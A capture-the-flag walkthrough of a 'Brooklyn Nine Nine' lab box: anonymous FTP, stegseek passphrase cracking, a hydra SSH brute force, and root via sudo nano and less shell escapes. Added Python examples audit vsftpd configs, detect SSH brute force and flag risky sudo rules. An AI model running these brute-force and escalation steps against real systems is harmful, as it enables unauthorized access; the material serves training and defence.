Nmap

First we scan for open ports

# nmap -p- -T4 -sV -sC 10.10.127.175 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-22 22:50 GMT
Nmap scan report for 10.10.127.175
Host is up (0.021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.11.18.78
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
|   256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_  256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.90 seconds

FTP

Let's start with the FTP port. Based on the nmap output (the ftp-anon script), anonymous login is allowed, so we can log in without credentials.

# ftp -A 10.10.127.175
Connected to 10.10.127.175.
220 (vsFTPd 3.0.3)
Name (10.10.127.175:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        114          4096 May 17  2020 .
drwxr-xr-x    2 0        114          4096 May 17  2020 ..
-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
226 Directory send OK.
ftp> get note_to_jake.txt
local: note_to_jake.txt remote: note_to_jake.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
100% |************************************************************|   119       39.52 KiB/s    00:00 ETA
226 Transfer complete.
119 bytes received in 00:00 (4.77 KiB/s)

note_to_jake.txt:

From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
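The anonymous login that nmap reported and the plaintext session the ftp-syst output shows are both vsftpd configuration choices. The following is an added example (not part of this writeup and not the room's real config) that audits a vsftpd.conf for exactly those two exposures. WEAK_CONF and HARDENED_CONF are constructed for the example; the one fact the check relies on is that vsftpd.conf(5) documents the compiled-in default of anonymous_enable as YES, so a file that simply omits the line is treated as exposed.

```python
"""Check a vsftpd.conf for anonymous-login and plaintext exposure.

Added example, not from the original writeup. WEAK_CONF resembles a setup
that produces the "Anonymous FTP login allowed" result nmap reported;
HARDENED_CONF is the corrected form. Both are constructed.
"""

WEAK_CONF = """
listen=YES
# anonymous_enable left unset: vsftpd's built-in default is YES
local_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_root=/var/ftp
"""

HARDENED_CONF = """
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
"""


def parse_vsftpd_conf(text):
    """Return {option: value} for the active (non-comment) lines."""
    opts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            opts[key.strip()] = value.strip()
    return opts


def _on(opts, key, default):
    """True when the option (or its documented default) is YES."""
    return opts.get(key, default).upper() == "YES"


def anonymous_ftp_findings(text):
    """Return a list of findings; an empty list means no exposure found."""
    opts = parse_vsftpd_conf(text)
    findings = []
    # vsftpd.conf(5): anonymous_enable defaults to YES when not set
    if _on(opts, "anonymous_enable", "YES"):
        how = "explicitly" if "anonymous_enable" in opts else "by default (option absent)"
        findings.append(f"anonymous login enabled {how}")
        # uploads need both the global write switch and the anon-specific one
        if _on(opts, "write_enable", "NO") and _on(opts, "anon_upload_enable", "NO"):
            findings.append("anonymous upload enabled")
    # matches the "Control connection is plain text" status nmap printed
    if not _on(opts, "ssl_enable", "NO"):
        findings.append("control/data connections in plaintext (ssl_enable not YES)")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, "->", anonymous_ftp_findings(conf) or ["no findings"])
```

Run it against the real file with `anonymous_ftp_findings(open("/etc/vsftpd.conf").read())`; the point of the default-handling branch is that a config which never mentions anonymous_enable still fails the check.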

Website

The website seems fairly basic.

However, checking the page source gives a hidden message.

Saving the image from the site, we use stegseek with the rockyou wordlist to crack the steghide passphrase and extract the hidden message.

# stegseek brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "*****"
[i] Original filename: "note.txt".
[i] Extracting to "brooklyn99.jpg.out".

This gives us another potential user and password

# cat brooklyn99.jpg.out 
Holts Password:
f******************e

Enjoy!!

Using those details we can login and get the user flag

# ssh holt@10.10.127.175                                  
The authenticity of host '10.10.127.175 (10.10.127.175)' can't be established.
ED25519 key fingerprint is SHA256:ceqkN71gGrXeq+J5/dquPWgcPWwTmP2mBdFS2ODPZZU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.127.175' (ED25519) to the list of known hosts.
holt@10.10.127.175's password: 
Last login: Tue May 26 08:59:00 2020 from 10.10.10.18
holt@brookly_nine_nine:~$ ls
nano.save  user.txt
holt@brookly_nine_nine:~$ cat user.txt 
e******************************e

Privilege escalation

Checking the sudo privileges, we see that holt can run nano as root without a password.

holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano

And checking GTFOBins, we can exploit this to escalate privileges.

Alternative method

The room description indicates there is a second method. For this one we will use the username gathered via FTP (jake, whose password the note says is weak) to brute force SSH.

# hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.127.175 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-22 23:13:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.127.175:22/
[22][ssh] host: 10.10.127.175   login: jake   password: *********
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-22 23:13:21
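A run like the one above leaves a very recognisable trace on the target: many "Failed password" events for one user from one source within seconds, then an "Accepted password" from the same source. The following is an added example (not part of this writeup) that detects that pattern in sshd auth-log lines. The log lines are constructed to mirror the session above, and the threshold and window values are assumptions to tune per environment.

```python
"""Flag SSH password-guessing bursts in sshd auth-log lines.

Added example, not from the original writeup. Looks for the trace a hydra
run leaves in /var/log/auth.log: many "Failed password" events for one
user from one source in a short window, optionally followed by an
"Accepted password" from the same source.
"""
import re
from collections import defaultdict
from datetime import datetime

# Classic syslog-style sshd lines (no year in the timestamp).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+ ssh2"
)

# Constructed sample: 12 guesses for jake within two seconds, then a success,
# followed by a single benign typo-and-retry by holt from another host.
SAMPLE_LOG = [
    f"Mar 22 23:13:{19 + i // 6} brookly_nine_nine sshd[{2000 + i}]: "
    f"Failed password for jake from 10.11.18.78 port {45000 + i} ssh2"
    for i in range(12)
] + [
    "Mar 22 23:13:21 brookly_nine_nine sshd[2012]: Accepted password for jake from 10.11.18.78 port 45012 ssh2",
    "Mar 22 23:20:02 brookly_nine_nine sshd[2100]: Failed password for holt from 10.10.10.18 port 51000 ssh2",
    "Mar 22 23:20:09 brookly_nine_nine sshd[2101]: Accepted password for holt from 10.10.10.18 port 51000 ssh2",
]


def parse_line(line, year=2025):
    """Return a dict for an sshd password event, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "src": m["src"]}


def detect_bruteforce(lines, threshold=10, window_seconds=60):
    """Return [(src, user, total_failures, succeeded_after_failures), ...].

    A (src, user) pair is flagged when at least `threshold` failures fall
    inside some `window_seconds` span (sliding window over sorted timestamps).
    """
    failures = defaultdict(list)
    successes = set()
    for event in filter(None, (parse_line(line) for line in lines)):
        key = (event["src"], event["user"])
        if event["result"] == "Failed":
            failures[key].append(event["ts"])
        elif failures[key]:  # a success only matters once failures preceded it
            successes.add(key)

    findings = []
    for key, stamps in failures.items():
        stamps.sort()
        best, j = 0, 0
        for i, ts in enumerate(stamps):
            while (ts - stamps[j]).total_seconds() > window_seconds:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            findings.append((key[0], key[1], len(stamps), key in successes))
    return findings


if __name__ == "__main__":
    for src, user, n, got_in in detect_bruteforce(SAMPLE_LOG):
        print(f"{src} -> {user}: {n} failures, later success: {got_in}")
```

Holt's single failed attempt is not flagged at the default threshold, while jake's burst is, together with the fact that a login succeeded afterwards, which is the case worth paging someone for.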

Using these details we log in as jake, and the user flag in holt’s account is readable to all users.

# ssh jake@10.10.127.175               
jake@10.10.127.175's password: 
Last login: Tue May 26 08:56:58 2020
jake@brookly_nine_nine:~$ ls
jake@brookly_nine_nine:~$ ls -l /home/holt/user.txt 
-rw-rw-r-- 1 holt holt 33 May 17  2020 /home/holt/user.txt

For the privilege escalation we check the sudo permissions and see we can run less. Again, using GTFOBins we can escape from this to root.

jake@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less

jake@brookly_nine_nine:~$ sudo less /etc/profile
# id
uid=0(root) gid=0(root) groups=0(root)
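Both escalations on this box (nano for holt, less for jake) come from the same misconfiguration: a NOPASSWD sudo rule on a binary that GTFOBins documents as able to spawn a shell. The following is an added example (not part of this writeup) that parses `sudo -l` output in the layout shown above and flags such rules. SHELL_ESCAPE_BINS is an illustrative subset of the GTFOBins list, not the full list, and SAMPLE_CLEAN is a constructed rule set for comparison.

```python
"""Audit `sudo -l` output for NOPASSWD rules on shell-escape binaries.

Added example, not part of the original writeup. Parses the text `sudo -l`
prints and flags rules whose command is a binary GTFOBins documents as able
to spawn a shell, or an unrestricted ALL rule.
"""
import re

# Illustrative subset of binaries with a documented sudo shell escape.
SHELL_ESCAPE_BINS = {
    "nano", "less", "more", "vim", "vi", "man", "awk", "find",
    "python", "python3", "perl", "env", "bash", "sh",
}
REASON = "shell escape documented on GTFOBins"

# One rule line: "(runas) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

# The two outputs from the writeup, plus a constructed benign rule set.
SAMPLE_HOLT = r"""
Matching Defaults entries for holt on brookly_nine_nine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano
"""
SAMPLE_JAKE = r"""
User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /usr/bin/less
"""
SAMPLE_CLEAN = r"""
User deploy may run the following commands on brookly_nine_nine:
    (root) NOPASSWD: /usr/bin/id, /bin/ls -l /var/log
"""


def parse_sudo_l(text):
    """Return (runas, tags, command) triples from `sudo -l` output."""
    rules, in_rules = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True      # everything after this header is a rule line
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = set(re.findall(r"([A-Z]+):", m["tags"]))
        for cmd in m["cmds"].split(","):
            rules.append((m["runas"], tags, cmd.strip()))
    return rules


def audit_sudo_l(text):
    """Return [(command, runas, nopasswd, reason)] for risky rules."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        nopasswd = "NOPASSWD" in tags
        if cmd == "ALL":
            findings.append((cmd, runas, nopasswd, "unrestricted sudo"))
            continue
        # Fixed arguments do not help: "less /etc/profile" still escapes.
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPE_BINS:
            findings.append((cmd, runas, nopasswd, REASON))
    return findings


if __name__ == "__main__":
    for name, sample in (("holt", SAMPLE_HOLT), ("jake", SAMPLE_JAKE), ("deploy", SAMPLE_CLEAN)):
        print(name, "->", audit_sudo_l(sample) or ["no risky rules"])
```

The remediation is the same in both cases: drop the rule, or if an editor or pager must run as root, use sudoedit for files and `less` with `LESSSECURE=1` is still not a safe substitute for a rule-free sudoers, so prefer a dedicated wrapper that takes no user-controlled arguments.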